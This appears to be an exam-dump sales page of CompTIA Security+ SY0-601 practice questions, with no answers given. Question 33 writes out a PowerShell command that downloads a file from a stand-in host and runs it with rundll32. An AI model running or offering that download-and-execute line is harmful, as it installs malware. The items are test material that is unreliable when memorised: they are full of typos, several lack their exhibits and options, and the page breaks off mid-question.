March Special Sale - Limited Time 60% Discount Offer - Ends in 0d 00h 00m 00s - Coupon code: 575363r9

Welcome To DumpsPedia

SY0-601 Sample Questions Answers

Questions 4

An email security vendor recently added a retroactive alert after discovering a phishing email had already been delivered to an inbox. Which of the following would be the best way for the security administrator to address this type of alert in the future?

Options:

A.

Utilize a SOAR playbook to remove the phishing message.

B.

Manually remove the phishing emails when alerts arrive.

C.

Delay all emails until the retroactive alerts are received.

D.

Ingest the alerts into a SIEM to correlate with delivered messages.

Buy Now
Questions 5

An attacker is targeting a company. The attacker notices that the company’s employees frequently access a particular website. The attacker decides to infect the website with malware and hopes the employees’ devices will also become infected. Which of the following techniques is the attacker using?

Options:

A.

Watering-hole attack

B.

Pretexting

C.

Typosquatting

D.

Impersonation

Buy Now
Questions 6

A security operations center wants to implement a solution that can execute files to test for malicious activity. The solution should provide a report of the files' activity against known threats.

Which of the following should the security operations center implement?

Options:

A.

theHarvester

B.

Nessus

C.

Cuckoo

D.

Sn1per

Buy Now
Questions 7

An engineer recently deployed a group of 100 web servers in a cloud environment. Per the security policy, all web-server ports except 443 should be disabled. Which of the following can be

used to accomplish this task?

Options:

A.

Application allow list

B.

Load balancer

C.

Host-based firewall

D.

VPN

Buy Now
Questions 8

A Security engineer needs to implement an MDM solution that complies with the corporate mobile device policy. The policy states that in order for mobile users to access corporate resources on their

devices, the following requirements must be met:

  • Mobile device OSs must be patched up to the latest release.
  • A screen lock must be enabled (passcode or biometric).
  • Corporate data must be removed if the device is reported lost or stolen.

Which of the following controls should the security engineer configure? (Select two).

Options:

A.

Disable firmware over-the-air

B.

Storage segmentation

C.

Posture checking

D.

Remote wipe

E.

Full device encryption

F.

Geofencing

Buy Now
Questions 9

A company wants to enable BYOD for checking email and reviewing documents. Many of the documents contain sensitive organizational information. Which of the following should be deployed first before allowing the use of personal devices to access company data?

Options:

A.

MDM

B.

RFID

C.

DLR

D.

SIEM

Buy Now
Questions 10

Physical access to the organization's servers in the data center requires entry and exit through multiple access points: a lobby, an access control vestibule, three doors leading to the server floor itself and eventually to a caged area solely for the organization's hardware. Which of the following controls is described in this scenario?

Options:

A.

Compensating

B.

Deterrent

C.

Preventive

D.

Detective

Buy Now
Questions 11

Which of the following is a security implication of newer 1CS devices that are becoming more common in corporations?

Options:

A.

Devices with celular communication capabilities bypass traditional network security controls

B.

Many devices do not support elliptic-curve encryption algorithms due to the overhead they require.

C.

These devices often lade privacy controls and do not meet newer compliance regulations

D.

Unauthorized voice and audio recording can cause loss of intellectual property

Buy Now
Questions 12

A security team will be outsourcing several key functions to a third party and will require that:

• Several of the functions will carry an audit burden.

• Attestations will be performed several times a year.

• Reports will be generated on a monthly basis.

Which of the following BEST describes the document that is used to define these requirements and stipulate how and when they are performed by the third party?

Options:

A.

MOU

B.

AUP

C.

SLA

D.

MSA

Buy Now
Questions 13

A company would like to move to the cloud. The company wants to prioritize control and security over cost and ease of management. Which of the following cloud models would best suit this company's priorities?

Options:

A.

Public

B.

Hybrid

C.

Community

D.

Private

Buy Now
Questions 14

A security investigation revealed mat malicious software was installed on a server using a server administrator credentials. During the investigation the server administrator explained that Telnet was regularly used to log in. Which of the blowing most likely occurred?

Options:

A.

A spraying attack was used to determine which credentials to use

B.

A packet capture tool was used to steal the password

C.

A remote-access Trojan was used to install the malware

D.

A directory attack was used to log in as the server administrator

Buy Now
Questions 15

While performing a threat-hunting exercise, a security analyst sees some unusual behavior occurring in an application when a user changes the display name. The security analyst decides to perform a static code analysis and receives the following pseudocode:

Which of the following attack types best describes the root cause of the unusual behavior?

Options:

A.

Server-side request forgery

B.

Improper error handling

C.

Buffer overflow

D.

SQL injection

Buy Now
Questions 16

An organization recently released a software assurance policy that requires developers to run code scans each night on the repository. After the first night, the security team alerted the developers that more than 2,000 findings were reported and need to

be addressed. Which of the following is the MOST likely cause for the high number of findings?

Options:

A.

The vulnerability scanner was not properly configured and generated a high number of false positives

B.

Third-party libraries have been loaded into the repository and should be removed from the codebase.

C.

The vulnerability scanner found several memory leaks during runtime, causing duplicate reports for the same issue.

D.

The vulnerability scanner was not loaded with the correct benchmarks and needs to be updated.

Buy Now
Questions 17

A Chief Information Security Officer (CISO) wants to implement a new solution that can protect against certain categories of websites, whether the employee is in the offer or away. Which of the following solutions should the CISO implement?

Options:

A.

VAF

B.

SWG

C.

VPN

D.

WDS

Buy Now
Questions 18

A global pandemic is forcing a private organization to close some business units and reduce staffing at others. Which of the following would be best to help the organization's executives determine their next course of action?

Options:

A.

An incident response plan

B.

A communication plan

C.

A disaster recovery plan

D.

A business continuity plan

Buy Now
Questions 19

A security administrator needs to block a TCP connection using the corporate firewall, Because this connection is potentially a threat. the administrator not want to back an RST Which of the following actions in rule would work best?

Options:

A.

Drop

B.

Reject

C.

Log alert

D.

Permit

Buy Now
Questions 20

A digital forensics team at a large company is investigating a case in which malicious code was downloaded over an HTTPS connection and was running in memory, but was never committed to disk. Which of the following techniques should the team use to obtain a sample of the malware binary?

Options:

A.

pcap reassembly

B.

SSD snapshot

C.

Image volatile memory

D.

Extract from checksums

Buy Now
Questions 21

A systems administrator needs to install a new wireless network for authenticated guest access. The wireless network should support 802. IX using the most secure encryption and protocol available.

Perform the following steps:

1. Configure the RADIUS server.

2. Configure the WiFi controller.

3. Preconfigure the client for an

incoming guest. The guest AD

credentials are:

User: guest01

Password: guestpass

Options:

Buy Now
Questions 22

Which of the following would be best to ensure data is saved to a location on a server, is easily scaled, and is centrally monitored?

Options:

A.

 Edge computing

B.

Microservices

C.

Containers

D.

Thin client

Buy Now
Questions 23

Which of the following Is the BEST reason to maintain a functional and effective asset management policy that aids in ensuring the security of an organization?

Options:

A.

To provide data to quantify risk based on the organization's systems

B.

To keep all software and hardware fully patched for known vulnerabilities

C.

To only allow approved, organization-owned devices onto the business network

D.

To standardize by selecting one laptop model for all users in the organization

Buy Now
Questions 24

An employee's company email is configured with conditional access and requires that MFA is enabled and used. An example of MFA is a phone call and:

Options:

A.

a push notification

B.

a password.

C.

an SMS message.

D.

an authentication application.

Buy Now
Questions 25

Which of the following describes where an attacker can purchase DDoS or ransomware services?

Options:

A.

Threat intelligence

B.

Open-source intelligence

C.

Vulnerability database

D.

Dark web

Buy Now
Questions 26

Which of the following processes would most likely help an organization that has conducted an incident response exercise to improve performance and identify challenges?

Options:

A.

Lessons learned

B.

Identification

C.

Simulation

D.

Containment

Buy Now
Questions 27

While researching a data exfiltration event, the security team discovers that a large amount of data was transferred to a file storage site on the internet. Which of the following controls would work best to reduce the risk of further exfiltration using this method?

Options:

A.

Data loss prevention

B.

Blocking IP traffic at the firewall

C.

Containerization

D.

File integrity monitoring

Buy Now
Questions 28

Which of the following would most likely include language prohibiting end users from accessing personal email from a company device?

Options:

A.

SLA

B.

BPA

C.

NDA

D.

AUP

Buy Now
Questions 29

A security team is engaging a third-party vendor to do a penetration test of a new proprietary application prior to its release. Which of the following documents would the third-party vendor

most likely be required to review and sign?

Options:

A.

SLA

B.

NDA

C.

MOU

D.

AUP

Buy Now
Questions 30

Audit logs indicate an administrative account that belongs to a security engineer has been locked out multiple times during the day. The security engineer has been on vacation (or a few days. Which of the following attacks can the account lockout be attributed to?

Options:

A.

Backdoor

B.

Brute-force

C.

Rootkit

D.

Trojan

Buy Now
Questions 31

A company needs to enhance Its ability to maintain a scalable cloud Infrastructure. The Infrastructure needs to handle the unpredictable loads on the company's web application. Which of the following

cloud concepts would BEST these requirements?

Options:

A.

SaaS

B.

VDI

C.

Containers

D.

Microservices

Buy Now
Questions 32

A security analyst is investigating a report from a penetration test. During the penetration test, consultants were able to download sensitive data from a back-end server. The back-end server was exposing an API that should have only been available from the companVs mobile

application. After reviewing the back-end server logs, the security analyst finds the following entries

Which of the following is the most likely cause of the security control bypass?

Options:

A.

IP address allow list

B.

user-agent spoofing

C.

WAF bypass

D.

Referrer manipulation

Buy Now
Questions 33

An employee received an email with an unusual file attachment named Updates . Lnk. A security analysts reverse engineering what the fle does and finds that executes the folowing script:

C:\Windows \System32\WindowsPowerShell\vl.0\powershell.exe -URI https://somehost.com/04EB18.jpg -OutFile $env:TEMP\autoupdate.dll;Start-Process rundll32.exe $env:TEMP\autoupdate.dll

Which of the following BEST describes what the analyst found?

Options:

A.

A Powershell code is performing a DLL injection.

B.

A PowerShell code is displaying a picture.

C.

A PowerShell code is configuring environmental variables.

D.

A PowerShell code is changing Windows Update settings.

Buy Now
Questions 34

A security analyst needs to recommend a solution that will allow current Active Directory accounts and groups to be used for access controls on both network and remote-access devices. Which of the

following should the analyst recommend? (Select two).

Options:

A.

TACACS+

B.

RADIUS

C.

OAuth

D.

OpenlD

E.

Kerberos

F.

CHAP

Buy Now
Questions 35

A security administrator Is managing administrative access to sensitive systems with the following requirements:

• Common login accounts must not be used (or administrative duties.

• Administrative accounts must be temporal in nature.

• Each administrative account must be assigned to one specific user.

• Accounts must have complex passwords.

• Audit trails and logging must be enabled on all systems.

Which of the following solutions should the administrator deploy to meet these requirements?

Options:

A.

ABAC

B.

SAML

C.

PAM

D.

CASB

Buy Now
Questions 36

An employee used a corporate mobile device during a vacation Multiple contacts were modified in the device vacation Which of the following method did attacker to insert the contacts without having 'Physical access to device?

Options:

A.

Jamming

B.

BluJacking

C.

Disassoaatm

D.

Evil twin

Buy Now
Questions 37

Which of the following should be addressed first on security devices before connecting to the network?

Options:

A.

Open permissions

B.

Default settings

C.

API integration configuration

D.

Weak encryption

Buy Now
Questions 38

Which of the following would a security analyst use to determine if other companies in the same sector have seen similar malicious activity against their systems?

Options:

A.

Vulnerability scanner

B.

Open-source intelligence

C.

Packet capture

D.

Threat feeds

Buy Now
Questions 39

A backup operator wants to perform a backup to enhance the RTO and RPO in a highly time- and storage-efficient way that has no impact on production systems. Which of the following backup types should the operator use?

Options:

A.

Tape

B.

Full

C.

Image

D.

Snapshot

Buy Now
Questions 40

A security architect is working on an email solution that will send sensitive data. However, funds are not currently available in the budget for building additional infrastructure. Which of the following should the architect choose?

Options:

A.

POP

B.

IPSec

C.

IMAP

D.

PGP

Buy Now
Questions 41

A small, local company experienced a ransomware attack. The company has one web-facing server and a few workstations. Everything is behind an ISP firewall. A single web-facing server

is set up on the router to forward all ports so that the server is viewable from the internet. The company uses an older version of third-party software to manage the website. The assets

were never patched. Which of the following should be done to prevent an attack like this from happening again? (Select three).

Options:

A.

Install DLP software to prevent data loss.

B.

Use the latest version of software.

C.

Install a SIEM device.

D.

Implement MDM.

E.

Implement a screened subnet for the web server.

F.

Install an endpoint security solution.

G.

Update the website certificate and revoke the existing ones.

Buy Now
Questions 42

Which of the following secure application development concepts aims to block verbose error messages from being shown in a user’s interface?

Options:

A.

OWASP

B.

Obfuscation/camouflage

C.

Test environment

D.

Prevent of information exposure

Buy Now
Questions 43

Which of the following should customers who are involved with Ul developer agreements be concerned with when considering the use of these products on highly sensitive projects?

Options:

A.

Weak configurations

B.

Integration activities

C.

Unsecure user accounts

D.

Outsourced code development

Buy Now
Questions 44

Which of the following can reduce vulnerabilities by avoiding code reuse?

Options:

A.

Memory management

B.

Stored procedures

C.

Normalization

D.

Code obfuscation

Buy Now
Questions 45

Unauthorized devices have been detected on the internal network. The devices’ locations were traced to Ether ports located in conference rooms. Which of the following would be the best technical controls to implement to prevent these devices from accessing the internal network?

Options:

A.

NAC

B.

DLP

C.

IDS

D.

MFA

Buy Now
Questions 46

A security engineer is installing a WAF to protect the company's website from malicious web requests over SSL. Which of the following is needed to meet the objective?

Options:

A.

A reverse proxy

B.

A decryption certificate

C.

A spill-tunnel VPN

D.

Load-balanced servers

Buy Now
Questions 47

Which of the following are the MOST likely vectors for the unauthorized inclusion of vulnerable code in a software company’s final software releases? (Select TWO.)

Options:

A.

Unsecure protocols

B.

Use of penetration-testing utilities

C.

Weak passwords

D.

Included third-party libraries

E.

Vendors/supply chain

F.

Outdated anti-malware software

Buy Now
Questions 48

Which of the following identifies the point in time when an organization will recover data in the event of an outage?

Options:

A.

SLA

B.

RPO

C.

MTBF

D.

ARO

Buy Now
Questions 49

A systems analyst determines the source of a high number of connections to a web server that were initiated by ten different IP addresses that belong to a network block in a specific country. Which of the following techniques will the systems analyst MOST likely implement to address this issue?

Options:

A.

Content filter

B.

SIEM

C.

Firewall rules

D.

DLP

Buy Now
Questions 50

A security engineer is reviewing the logs from a SAML application that is configured to use MFA, during this review the engineer notices a high volume of successful logins that did not require MFA from users who were traveling internationally. The application, which can be accessed without a VPB, has a policy that allows time-based tokens to be generated. Users who changed locations should be required to reauthenticate but have been Which of the following statements BEST explains the issue?

Options:

A.

OpenID is mandatory to make the MFA requirements work

B.

An incorrect browser has been detected by the SAML application

C.

The access device has a trusted certificate installed that is overwriting the session token

D.

The user’s IP address is changing between logins, bur the application is not invalidating the token

Buy Now
Questions 51

A security administrator is working on a solution to protect passwords stored in a database against rainbow table attacks Which of the following should the administrator consider?

Options:

A.

Hashing

B.

Salting

C.

Lightweight cryptography

D.

Steganography

Buy Now
Questions 52

A network analyst is setting up a wireless access point for a home office in a remote, rural location. The requirement is that users need to connect to the access point securely but do not want to have to remember passwords Which of the following should the network analyst enable to meet the requirement?

Options:

A.

MAC address filtering

B.

802.1X

C.

Captive portal

D.

WPS

Buy Now
Questions 53

A systems engineer is building a new system for production. Which of the following is the FINAL step to be performed prior to promoting to production?

Options:

A.

Disable unneeded services.

B.

Install the latest security patches.

C.

Run a vulnerability scan.

D.

Encrypt all disks.

Buy Now
Questions 54

During an incident, a company's CIRT determines it is necessary to observe the continued network-based transactions between a callback domain and the malware running on an enterprise PC. Which

of the following techniques would be BEST to enable this activity while reducing the nsk of lateral spread and the risk that the adversary would notice any changes?

Options:

A.

Physically move the PC to a separate Internet point of presence.

B.

Create and apply microsegmentation rules,

C.

Emulate the malware in a heavily monitored DMZ segment

D.

Apply network blacklisting rules for the adversary domain

Buy Now
Questions 55

Which of the following in a forensic investigation should be priorities based on the order of volatility? (Select TWO).

Options:

A.

Page files

B.

Event logs

C.

RAM

D.

Cache

E.

Stored files

F.

HDD

Buy Now
Questions 56

Remote workers in an organization use company-provided laptops with locally installed applications and locally stored data Users can store data on a remote server using an encrypted connection. The organization discovered data stored on a laptop had been made available to the public Which of the following security solutions would mitigate the risk of future data disclosures?

Options:

A.

FDE

B.

TPM

C.

HIDS

D.

VPN

Buy Now
Questions 57

Which of the following would MOST likely be identified by a credentialed scan but would be missed by an uncredentialed scan?

Options:

A.

Vulnerabilities with a CVSS score greater than 6.9.

B.

Critical infrastructure vulnerabilities on non-IP protocols.

C.

CVEs related to non-Microsoft systems such as printers and switches.

D.

Missing patches for third-party software on Windows workstations and servers.

Buy Now
Questions 58

A user reports trouble using a corporate laptop. The laptop freezes and responds slowly when writing documents and the mouse pointer occasional disappears.

The task list shows the following results

Which of the following is MOST likely the issue?

Options:

A.

RAT

B.

PUP

C.

Spyware

D.

Keylogger

Buy Now
Questions 59

A security engineer needs to create a network segment that can be used for servers thal require connections from untrusted networks. Which of the following should the engineer implement?

Options:

A.

An air gap

B.

A hot site

C.

A VUAN

D.

A screened subnet

Buy Now
Questions 60

An organization wants seamless authentication to its applications. Which of the following should the organization employ to meet this requirement?

Options:

A.

SOAP

B.

SAML

C.

SSO

D.

Kerberos

Buy Now
Questions 61

Which of the following cryptographic concepts would a security engineer utilize while implementing non-repudiation? (Select TWO)

Options:

A.

Block cipher

B.

Hashing

C.

Private key

D.

Perfect forward secrecy

E.

Salting

F.

Symmetric keys

Buy Now
Questions 62

An organization's Chief Information Security Officer is creating a position that will be responsible for implementing technical controls to protect data, including ensuring backups are properly maintained. Which of the following roles would MOST likely include these responsibilities?

Options:

A.

Data protection officer

B.

Data owner

C.

Backup administrator

D.

Data custodian

E.

Internal auditor

Buy Now
Questions 63

A company Is planning to install a guest wireless network so visitors will be able to access the Internet. The stakeholders want the network to be easy to connect to so time is not wasted during meetings. The WAPs are configured so that power levels and antennas cover only the conference rooms where visitors will attend meetings. Which of the following would BEST protect the company's Internal wireless network against visitors accessing company resources?

Options:

A.

Configure the guest wireless network to be on a separate VLAN from the company's internal wireless network

B.

Change the password for the guest wireless network every month.

C.

Decrease the power levels of the access points for the guest wireless network.

D.

Enable WPA2 using 802.1X for logging on to the guest wireless network.

Buy Now
Questions 64

A cybersecurity administrator needs to implement a Layer 7 security control on a network and block potential attacks. Which of the following can block an attack at Layer 7? (Select TWO).

Options:

A.

HIDS

B.

NIPS

C.

HSM

D.

WAF

E.

NAC

F.

NIDS

G.

Stateless firewall

Buy Now
Questions 65

An enterprise has hired an outside security firm to facilitate penetration testing on its network and applications. The firm has agreed to pay for each vulnerability that ts discovered. Which of the following BEST represents the type of testing that is being used?

Options:

A.

White-box

B.

Red-leam

C.

Bug bounty

D.

Gray-box

E.

Black-box

Buy Now
Questions 66

Which of the following must be in place before implementing a BCP?

Options:

A.

SLA

B.

AUP

C.

NDA

D.

BIA

Buy Now
Questions 67

The Chief Technology Officer of a local college would like visitors to utilize the school's WiFi but must be able to associate potential malicious activity to a specific person. Which of the following would BEST allow this objective to be met?

Options:

A.

Requiring all new, on-site visitors to configure their devices to use WPS

B.

Implementing a new SSID for every event hosted by the college that has visitors

C.

Creating a unique PSK for every visitor when they arrive at the reception area

D.

Deploying a captive portal to capture visitors' MAC addresses and names

Buy Now
Questions 68

A Chief Information Security Officer (CISO) is evaluating (he dangers involved in deploying a new ERP system tor the company. The CISO categorizes the system, selects the controls mat apply to the system, implements the controls, and then assesses the success of the controls before authorizing the system Which of the following is the CISO using to evaluate Hie environment for this new ERP system?

Options:

A.

The Diamond Model of Intrusion Analysis

B.

CIS Critical Security Controls

C.

NIST Risk Management Framevtoik

D.

ISO 27002

Buy Now
Questions 69

A retail company that is launching @ new website to showcase the company’s product line and other information for online shoppers registered the following URLs:

* www companysite com

* shop companysite com

* about-us companysite com

contact-us. companysite com

secure-logon company site com

Which of the following should the company use to secure its website if the company is concerned with convenience and cost?

Options:

A.

A self-signed certificate

B.

A root certificate

C.

A code-signing certificate

D.

A wildcard certificate

E.

An extended validation certificate

Buy Now
Questions 70

A security analyst reviews a company’s authentication logs and notices multiple authentication failures. The authentication failures are from different usernames that share the same source IP address. Which of the password attacks is MOST likely happening?

Options:

A.

Dictionary

B.

Rainbow table

C.

Spraying

D.

Brute-force

Buy Now
Questions 71

An organization wants to integrate its incident response processes into a workflow with automated decision points and actions based on predefined playbooks. Which of the following should the organization implement?

Options:

A.

SIEM

B.

SOAR

C.

EDR

D.

CASB

Buy Now
Questions 72

The following are the logs of a successful attack.

Which of the following controls would be BEST to use to prevent such a breach in the future?

Options:

A.

Password history

B.

Account expiration

C.

Password complexity

D.

Account lockout

Buy Now
Questions 73

Hackers recently attacked a company's network and obtained several unfavorable pictures from the Chief Executive Officer's workstation. The hackers are threatening to send the images to the press if a ransom is not paid. Which of the following is impacted the MOST?

Options:

A.

Identify theft

B.

Data loss

C.

Data exfiltration

D.

Reputation

Buy Now
Questions 74

A company recently decided to allow its employees to use their personally owned devices for tasks like checking email and messaging via mobile applications. The company would like to use MDM, but employees are concerned about the loss of personal data. Which of the following should the IT department implement to BEST protect the company against company data loss while still addressing the employees’ concerns?

Options:

A.

Enable the remote-wiping option in the MDM software in case the phone is stolen.

B.

Configure the MDM software to enforce the use of PINs to access the phone.

C.

Configure MDM for FDE without enabling the lock screen.

D.

Perform a factory reset on the phone before installing the company's applications.

Buy Now
Questions 75

Which of the following provides a catalog of security and privacy controls related to the United States federal information systems?

Options:

A.

GDPR

B.

PCI DSS

C.

ISO 27000

D.

NIST 800-53

Buy Now
Questions 76

Certain users are reporting their accounts are being used to send unauthorized emails and conduct suspicious activities. After further investigation, a security analyst notices the following:

• All users share workstations throughout the day.

• Endpoint protection was disabled on several workstations throughout the network.

• Travel times on logins from the affected users are impossible.

• Sensitive data is being uploaded to external sites.

• All user account passwords were forced to be reset and the issue continued.

Which of the following attacks is being used to compromise the user accounts?

Options:

A.

Brute-force

B.

Keylogger

C.

Dictionary

D.

Rainbow

Buy Now
Questions 77

A systems administrator is considering different backup solutions for the IT infrastructure. The company is looking for a solution that offers the fastest recovery time while also saving the most amount of storage used to maintain the backups. Which of the following recovery solutions would be the BEST option to meet these requirements?

Options:

A.

Snapshot

B.

Differential

C.

Full

D.

Tape

Buy Now
Questions 78

A new vulnerability in the SMB protocol on the Windows systems was recently discovered, but no patches are currently available to resolve the issue. The security administrator is concerned tf servers in the company's DMZ will be vulnerable to external attack; however, the administrator cannot disable the service on the servers, as SMB is used by a number of internal systems and applications on the LAN. Which of the following TCP ports should be blocked for all external inbound connections to the DMZ as a workaround to protect the servers? (Select TWO).

Options:

A.

135

B.

139

C.

143

D.

161

E.

443

F.

445

Buy Now
Questions 79

A security analyst needs to implement an MDM solution for BYOD users that will allow the company to retain control over company emails residing on the devices and limit data exfiltration that might occur if the devices are lost or stolen.Which of the following would BEST meet these requirements? (Select TWO).

Options:

A.

Full-device encryption

B.

Network usage rules

C.

Geofencing

D.

Containerization

E.

Application whitelisting

F.

Remote control

Buy Now
Questions 80

During an incident a company CIRT determine it is necessary to observe the continued network-based transaction between a callback domain and the malware running on an enterprise PC. Which of the following techniques would be BEST to enable this activity while reducing the risk of lateral spread and the risk that the adversary would notice any changes?

Options:

A.

Physical move the PC to a separate internet pint of presence

B.

Create and apply micro segmentation rules.

C.

Emulate the malware in a heavily monitored DM Z segment.

D.

Apply network blacklisting rules for the adversary domain

Buy Now
Questions 81

Per company security policy, IT staff members are required to have separate credentials to perform administrative functions using just-in-time permissions. Which of the following solutions is the company Implementing?

Options:

A.

Privileged access management

B.

SSO

C.

RADIUS

D.

Attribute-based access control

Buy Now
Questions 82

After a phishing scam fora user's credentials, the red team was able to craft payload to deploy on a server. The attack allowed the installation of malicious software that initiates a new remote session

Which of the following types of attacks has occurred?

Options:

A.

Privilege escalation

B.

Session replay

C.

Application programming interface

D.

Directory traversal

Buy Now
Questions 83

An organization would like to remediate the risk associated with its cloud service provider not meeting its advertised 99.999% availability metrics. Which of the following should the organization consult for the exact requirements for the cloud provider?

Options:

A.

SLA

B.

BPA

C.

NDA

D.

MOU

Buy Now
Questions 84

As part of a company's ongoing SOC maturation process, the company wants to implement a method to share cyberthreat intelligence data with outside security partners. Which of the following will the company MOST likely implement?

Options:

A.

TAXII

B.

TLP

C.

TTP

D.

STIX

Buy Now
Questions 85

A business is looking for a cloud service provider that offers a la carte services, including cloud backups, VM elasticity, and secure networking. Which of the following cloud service provider types should business engage?

Options:

A.

A laaS

B.

PaaS

C.

XaaS

D.

SaaS

Buy Now
Questions 86

An attacker replaces a digitally signed document with another version that goes unnoticed Upon reviewing the document's contents the author notices some additional verbiage that was not originally in the document but cannot validate an integrity issue. Which of the following attacks was used?

Options:

A.

Cryptomalware

B.

Hash substitution

C.

Collision

D.

Phishing

Buy Now
Questions 87

The Chief Information Security Officer wants to pilot a new adaptive, user-based authentication method. The concept Includes granting logical access based on physical location and proximity. Which of the following Is the BEST solution for the pilot?

Options:

A.

Geofencing

B.

Self-sovereign identification

C.

PKl certificates

D.

SSO

Buy Now
Questions 88

An employee, receives an email stating he won the lottery. The email includes a link that requests a name, mobile phone number, address, and date of birth be provided to confirm employee's identity before sending him the prize. Which of the following BEST describes this type of email?

Options:

A.

Spear phishing

B.

Whaling

C.

Phishing

D.

Vishing

Buy Now
Questions 89

A desktop support technician recently installed a new document-scanning software program on a computer. However, when the end user tried to launch the program, it did not respond. Which of the following is MOST likely the cause?

Options:

A.

A new firewall rule is needed to access the application.

B.

The system was quarantined for missing software updates.

C.

The software was not added to the application whitelist.

D.

The system was isolated from the network due to infected software

Buy Now
Questions 90

A company is adding a clause to its AUP that states employees are not allowed to modify the operating system on mobile devices. Which of the following vulnerabilities is the organization addressing?

Options:

A.

Cross-site scripting

B.

Buffer overflow

C.

Jailbreaking

D.

Side loading

Buy Now
Questions 91

one of the attendees starts to notice delays in the connection. and the HTTPS site requests are reverting to HTTP. Which of the following BEST describes what is happening?

Options:

A.

Birthday collision on the certificate key

B.

DNS hacking to reroute traffic

C.

Brute force to the access point

D.

A SSL/TLS downgrade

Buy Now
Questions 92

An attacker was eavesdropping on a user who was shopping online. The attacker was able to spoof the IP address associated with the shopping site. Later, the user received an email regarding credit card statement with unusual purchases. Which of the following attacks took place?

Options:

A.

On-path attack

B.

Protocol poisoning

C.

Domain hijacking

D.

Bluejacking

Buy Now
Questions 93

A host was infected with malware. During the incident response. Joe, a user, reported that he did not receive any emails with links, but he had been browsing the internet all day. Which of the following would most likely show where the malware originated?

Options:

A.

The DNS logs

B.

The web server logs

C.

The SIP traffic logs

D.

The SNMP logs

Buy Now
Questions 94

Which of the following holds staff accountable while escorting unauthorized personnel?

Options:

A.

Locks

B.

Badges

C.

Cameras

D.

Visitor logs

Buy Now
Questions 95

Which of the following exercises should an organization use to improve its incident response process?

Options:

A.

Tabletop

B.

Replication

C.

Failover

D.

Recovery

Buy Now
Questions 96

A security engineer must deploy two wireless routers in an office suite Other tenants in the office building should not be able to connect to this wireless network Which of the following protocols should the engineer implement to ensure the strongest encryption?

Options:

A.

WPS

B.

WPA2

C.

WAP

D.

HTTPS

Buy Now
Questions 97

Which of the following components can be used to consolidate and forward inbound internet traffic to multiple cloud environments though a single firewall?

Options:

A.

Transit gateway

B.

Cloud hot site

C.

Edge computing

D.

DNS sinkhole

Buy Now
Questions 98

Employees in the research and development business unit receive extensive training 10 ensure they understand how to best protect company data. Which of the following is the type of data these employees are most likely to use in day-to-day work activities?

Options:

A.

Encrypted

B.

Intellectual property

C.

Critical

D.

Data in transit

Buy Now
Questions 99

Which of the following is an administrative control that would be most effective to reduce the occurrence of malware execution?

Options:

A.

Security awareness training

B.

Frequency of NIDS updates

C.

Change control procedures

D.

EDR reporting cycle

Buy Now
Questions 100

Security analysts are conducting an investigation of an attack that occurred inside the organization's network. An attacker was able to coiled network traffic between workstations throughout the network The analysts review the following logs:

The Layer 2 address table has hundreds of entries similar to the ones above Which of the following attacks has most likely occurred?

Options:

A.

SQL injection

B.

DNS spoofing

C.

MAC flooding

D.

ARP poisoning

Buy Now
Questions 101

A company recently experienced a data breach and the source was determined to be an executive who was charging a phone in a public area. Which of the following would most likely have prevented this breach?

Options:

A.

A firewall

B.

A device pin

C.

A USB data blocker

D.

Biometrics

Buy Now
Questions 102

An organization is concerned about intellectual property theft by employees who leave the organization Which of the following should the organization most likely implement?

Options:

A.

CBT

B.

NDA

C.

MOU

D.

AUP

Buy Now
Questions 103

Which of the following would be most effective to contain a rapidly spreading attack that is affecting a large number of organizations?

Options:

A.

Machine learning

B.

DNS sinkhole

C.

Blocklist

D.

Honey pot

Buy Now
Questions 104

A retail executive recently accepted a job with a major competitor. The following week, a security analyst reviews the security logs and identifies successful logon attempts to access the departed executive's accounts. Which of the following security practices would have addressed the issue?

Options:

A.

A non-disclosure agreement

B.

Least privilege

C.

An acceptable use policy

D.

Off boarding

Buy Now
Questions 105

A company purchased cyber insurance to address items listed on the risk register. Which of the following strategies does this represent?

Options:

A.

Accept

B.

Transfer

C.

Mitigate

D.

Avoid

Buy Now
Questions 106

A new vulnerability enables a type of malware that allows the unauthorized movement of data from a system Which of the following would detect this behavior?

Options:

A.

Implementing encryption

B.

Monitoring outbound traffic

C.

Using default settings

D.

Closing all open ports

Buy Now
Questions 107

An engineer is setting up a VDI environment for a factory location, and the business wants to deploy a low-cost solution to enable users on the shop floor to log in to the VDI environment directly. Which of the following should the engineer select to meet these requirements?

Options:

A.

Laptops

B.

Containers

C.

Thin clients

D.

Workstations

Buy Now
Questions 108

A Chief Information Security Officer (CISO) wants to explicitly raise awareness about the increase of ransomware-as-a-service in a report to the management team. Which of the following best describes the threat actor in the CISO's report?

Options:

A.

Insider threat

B.

Hacktivist

C.

Nation-state

D.

Organized crime

Buy Now
Questions 109

A user's login credentials were recently compromised During the investigation, the security analyst determined the user input credentials into a pop-up window when prompted to confirm the username and password However the trusted website does not use a pop-up for entering user colonials Which of the following attacks occurred?

Options:

A.

Cross-site scripting

B.

SOL injection

C.

DNS poisoning

D.

Certificate forgery

Buy Now
Questions 110

A dynamic application vulnerability scan identified that code injection could be performed using a web form. Which of the following will be the best remediation to prevent this vulnerability?

Options:

A.

Implement input validations

B.

Deploy UFA

C.

Utilize a WAF

D.

Conjure HIPS

Buy Now
Questions 111

A company is looking to migrate some servers to the cloud to minimize its technology footprint The company has a customer relationship management system on premises Which of the following solutions will require the least infrastructure and application support from the company?

Options:

A.

SaaS

B.

IaaS

C.

PaaS

D.

SDN

Buy Now
Questions 112

The application development teams have been asked to answer the following questions:

  • Does this application receive patches from an external source?
  • Does this application contain open-source code?
  • Is this application accessible by external users?
  • Does this application meet the corporate password standard?

Which of the following are these questions part of?

Options:

A.

Risk control self-assessment

B.

Risk management strategy

C.

Risk acceptance

D.

Risk matrix

Buy Now
Questions 113

Which of the following threat vectors would appear to be the most legitimate when used by a malicious actor to impersonate a company?

Options:

A.

Phone call

B.

Instant message

C.

Email

D.

Text message

Buy Now
Questions 114

An organization is concerned that ils hosted web servers are not running the most updated version of the software. Which of the following would work best to help identify potential vulnerabilities?

Options:

A.

hping3 -S compcia.org -p 80

B.

nc -1 -v comptia.crg -p 80

C.

nmap comptia.org -p 80 -sv

D.

nslookup -port«80 comptia.org

Buy Now
Questions 115

A cybersecurity analyst reviews the log files from a web server end sees a series of files that indicate a directory traversal attack has occurred Which of the following is the analyst most likely seeing?

Options:

A.

B.

C.

D.

Buy Now
Questions 116

During an incident, an EDR system detects an increase in the number of encrypted outbound connections from multiple hosts. A firewall is also reporting an increase in outbound connections that use random high ports. An

analyst plans to review the correlated logs to find the source of the incident. Which of the following tools will best assist the analyst?

Options:

A.

A vulnerability scanner

B.

A NGFW

C.

The Windows Event Viewer

D.

